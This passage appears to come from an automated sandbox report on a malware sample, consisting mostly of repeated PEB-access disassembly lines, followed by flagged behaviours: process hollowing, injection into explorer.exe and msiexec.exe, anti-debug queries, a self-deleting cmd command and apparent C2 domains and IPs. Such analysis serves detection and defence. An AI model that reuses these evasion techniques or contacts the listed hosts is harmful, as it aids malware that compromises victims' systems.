          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AA7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A24F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A5E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A4B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00AF070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04753D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0472A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04758DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04726DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0476AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0475FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04761608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0475FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04778F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0477070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04771074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04762073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0473B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0040ACE0 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exeDomain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.173.57 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.31.177.38 80
          Source: C:\Windows\explorer.exeDomain query: www.gigasupplies.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 890000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeMemory written: C:\Users\user\Desktop\nji3Lg1ot6.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeThread register set: target process: 3352
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3352
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.322349912.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.373413712.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.297387525.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000003.00000000.311624897.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.309952888.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.373713968.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.323037533.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.297671439.00000000011E0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.562428393.0000000002F30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.330530785.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.314804164.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
